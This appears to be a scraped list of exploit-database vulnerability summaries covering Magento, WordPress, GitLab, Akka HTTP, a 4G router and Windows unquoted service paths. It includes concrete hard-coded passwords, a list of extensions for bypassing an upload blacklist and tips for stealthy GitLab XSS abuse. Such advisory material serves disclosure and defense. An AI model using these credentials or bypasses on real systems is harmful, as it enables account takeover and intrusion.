Magento eCommerce CE v2.3.5-p2 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries via the quote_id parameter in the POST /cargo/index/validateqty request and the PUT /rest/default/V1/carts/mine/coupons/aydin request. This can allow an attacker to extract data from the database, modify data, execute administration operations, and potentially compromise the system.
WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver.
USR-G806 is a industrial 4G wireless LTE router which provides a solution for users to connect own device to 4G network via WiFi interface or Ethernet interface. USR-G806 adopts high performance embedded CPU which can support 580MHz working frequency and can be widely used in Smart Grid, Smart Home, public bus and Vending machine for data transmission at high speed. USR-G806 is vulnerable to hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the device. The 'usr' account with password 'www.usr.cn' has the highest privileges on the device. The password is also the default WLAN password.
This exploit is related to CVE-2021-42697, which is a denial of service vulnerability in Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7. The exploit is achieved by sending a malicious request with a nested comment payload in the User-Agent header. The payload is 8191 characters long, which is sufficient to trigger a stack overflow. If the server is successfully DoSed, an exception will be returned.
Microfinance Management System allows SQL Injection via parameter 'customer_number' in /mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Between lines 152 and 162, we see the function 'extensionsToBeSanitized'. Since the blacklist method is weak, it is familiar that the file can be uploaded in the extensions mentioned below: .php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor. Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though. Standard script include also works depending on the sites CSP policy. This is more stealthy.
A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password: 123qweQWE!@#000000000
EaseUS Data Recovery contains a vulnerability in the 'ensserver.exe' service, which is installed with the EaseUS UPDATE SERVICE. The service is configured to start automatically, but the path to the executable is not quoted, which could allow an attacker to gain elevated privileges.
The vulnerability exists due to an unquoted service path in the PTProtect service. An attacker can exploit this vulnerability by creating a malicious executable file with the same name as the service executable file and placing it in the same directory. This will allow the malicious executable to be executed with SYSTEM privileges.
Services By CQR